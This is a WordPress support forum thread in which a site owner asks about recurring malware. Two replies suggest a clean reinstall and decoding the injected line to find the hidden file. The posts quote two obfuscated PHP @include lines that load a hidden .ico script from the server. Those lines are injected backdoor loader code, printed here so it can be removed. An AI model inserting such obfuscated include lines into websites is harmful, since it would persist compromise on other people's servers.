Using WordPress

krees · ‎07-01-2019

Hello all!

I've been struggling with my websites due a to a malware in my wordpress installation that every time I remove it.

It changes wp-setting, wp-config and index and adds the following code:

/*77383*/

@include "\057va\162/c\150ro\157t/\150om\145/c\157nt\145nt\05709\05711\06176\06109\057ht\155l/\137ft\05712\0600/\05687\06498\14622\056ic\157";

/*77383*/

It creates a .ico file randomly in some directory that contains a huge-script.

I've tried changing the permissions, erasing this file, removing the script but it only pops again.

The sucuri plugin doesn't detect it. The wordfence plugin does.

I've even installed the wordpress security on the domain and it keeps poping.

Does anyone has a clue about this?

Thanks in advance

PL281 · ‎07-01-2019

@krees

When I've had sites like this

1) I typically setup a brand new clean wordpress install

2) I manually re-install the plugins / theme (making sure I have the most up to date versions

3) I then copy the content manually between sites

If you are on a cPanel (a.k.a. shared) server and especially if you have multiple websites on the server, you may want to set up a folder for this outside of public HTML folder just to make sure it isn't another site in the folder causing the issue

I would then make sure that the wp-includes / wp-admin folders are locked down from a permissions perspective

Unfortunately this is one of the best ways to make sure you really clear out all the bad files / infected files

I am a GoDaddy End User - Just Like You
Check out my site! | I currently manage over 300 WordPress Websites
* Please note that I offer free advice on this forum. Thank You Info If you would like personalized help, please contact me. Otherwise, please ask your question in the proper forum so the answer can assist EVERYONE in the community and not just you. Thanks! *

Once your issue is resolved,
please be sure to come back and click accept for the solution

Get Better Support on the Community Boards!
Etiquette When Asking for Help from the Community

View solution in original post

PL281 · ‎07-01-2019

@krees

When I've had sites like this

1) I typically setup a brand new clean wordpress install

2) I manually re-install the plugins / theme (making sure I have the most up to date versions

3) I then copy the content manually between sites

If you are on a cPanel (a.k.a. shared) server and especially if you have multiple websites on the server, you may want to set up a folder for this outside of public HTML folder just to make sure it isn't another site in the folder causing the issue

I would then make sure that the wp-includes / wp-admin folders are locked down from a permissions perspective

Unfortunately this is one of the best ways to make sure you really clear out all the bad files / infected files

I am a GoDaddy End User - Just Like You
Check out my site! | I currently manage over 300 WordPress Websites
* Please note that I offer free advice on this forum. Thank You Info If you would like personalized help, please contact me. Otherwise, please ask your question in the proper forum so the answer can assist EVERYONE in the community and not just you. Thanks! *

Once your issue is resolved,
please be sure to come back and click accept for the solution

Get Better Support on the Community Boards!
Etiquette When Asking for Help from the Community

View solution in original post

Robodog · ‎08-12-2019

I have figured this out and how to fix it. Look for a php decoder online drop this code from your config file in the encoder it will unencrypt it and tell you where the virus file is located. deleted it and the code in the config file that looks like the one below and problem solved.

@include "\057va\162/c\150ro\157t/\150om\145/c\157nt\145nt\057a2\160ne\170wp\156as\0602_\144at\14102\05753\05735\06499\0653/\150tm\154/w\160-c\157nt\145nt\057up\154oa\144s/\162ev\163li\144er\057.b\064e4\07144\070.i\143o";

/*0f9af*/

Using WordPress

Wordpress Malware / Virus

You may also like...